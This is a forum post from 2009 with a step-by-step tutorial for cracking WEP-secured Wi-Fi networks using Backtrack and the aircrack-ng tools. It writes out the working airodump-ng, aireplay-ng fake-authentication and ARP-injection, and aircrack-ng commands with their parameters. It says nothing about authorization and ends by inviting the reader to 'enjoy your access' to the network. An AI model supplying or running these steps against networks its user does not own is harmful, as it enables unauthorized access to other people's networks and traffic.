Posts : 94 Points : 5628 Join date : 2009-12-26 Age : 34 Location : Malaysia
Subject: Cracking WEP Thu Dec 31, 2009 4:14 am
Quote :
This tutorial was made by using Backtrack 3, a Linux live cd.
Following this tutorial word for word will only work on Linux, it's recommended you download and burn backtrack to a disc. Backtrack includes everything you need.
Pre-requisites:
Kismet - Kismet is a wireless network detector, and also a packet sniffer airmon - This tool can set your wireless network adapter into monitor mode iwconfig - This tool configures your wireless network adapters. This can also show if your adapter is in monitor mode or not. macchanger - This tool lets you spoof your MAC (Media Access Control) address airodump - airodump captures packets from the target AP (Access Point, wireless router) aireplay - aireplay creates ARP requests used to get IV's from an AP aircrack - aircrack decrypts WEP keys from captured IV's
OR
backtrack (2, beta 3) - Linux live cd, includes everything needed
What we're going to do here today is crack a WEP (Wired Equivalent Privacy) secured network. This can be done by faking authentication with the router, and acquiring specializd packets called IV's (Initialization Vector) that are used to crack the WEP key. It usually takes around 20,000 IV's for a successful crack, but this depends on the level of encryption (40-128bit), and the strength of the key. 128 bit is the most secure, but of course, they can all be cracked, it just changes the time required to crack.
WEP uses the stream cipher RC4 for encryption, and the CRC-32 checksum for integrity. Standard 64-bit WEP incorporates a 40-bit key, which is added to a 24-bit IV, which forms the RC4 key. A 128-bit key is usually a string of 26 hex characters, which represents 4 bits each, resulting in 104 bits, with the addition of a 24-bit IV. The same goes for a 256-bit WEP key, this is entered as 58 hex characters, with 4 bits each, resulting in 232-bits of protection.
Now that you have a generalized background of WEP encryption, you're ready to move on the actual cracking of this encryption.
Open up kismet, and enable monitoring mode on your device (ex: eth1). Now run iwconfig to check that you have selected the right target network.
Now run airodump to start collecting data while we make certain changes: (ex<blockquote>airodump-ng eth1 -w /mnt/hda1/home/evox/(*filename*) --channel 4 --ivs</blockquote>* eth1 is the network adapter (may be different) * -w tells airodump to write the data to the following file (/mnt/hda1/home/evox/*.ivs) * --channel 4 is the channel we are connecting through, replace with the channel of the target AP * --ivs tells airodump to only collect IV's
Now we're going to fake authentication with aireplay. <blockquote>aireplay-ng -1 0 -e *ESSID* -a *BSSID (MAC)* -h *ADAPTER MAC* eth1</blockquote>* -1 is the type of attack, in this case, we're faking authentication with the AP * 0 stands for the delay between attacks * -e *ESSID*, replace *ESSID* with the ESSID (broadcast name) of your target AP. * -a *BSSID*, replace *BSSID* with the MAC Address of the AP * -h *ADAPTER MAC*, replace *ADAPTER MAC* with the MAC address of your wireless adapter, this can be viewed by
using macchanger (ex: macchanger -s eth1) * eth1 is the wireless adapter
Now that we faked authentication with the AP, we need to start injecting packets with aireplay. <blockquote>aireplay-ng -3 -b *BSSID (MAC)* -h *ADAPTER MAC* eth1</blockquote>* -3 is the type of attack we are initiating, in this case, packet injection (ARP request forging)
If you get a deauth/disassoc packet, re-fake authenticate with the AP using aireplay as mentioned before.
When you start getting a boat load of ARP packets (receiving and transmitting), wait a little while (it took me 2 minutes), and then go to the following step.
Now we're going to crack the IV's that we captured using airodump, with aircrack. <blockquote>aircrack-ng -s /mnt/hda1/evox/*.ivs</blockquote>* replace '*' with what you named the file in the first step
If you collected around 20,000 IV's, you should definitely have enough, just sit back and wait for aircrack to crack the wep key. When it's done, write down the WEP key, and enjoy your access to the 'protected' network!
If you didn't have enough IV's, keep using airodump to collect IV's, and aireplay to get more ARP requests.
If I missed anything, or wrote something wrong, please tell me. Enjoy!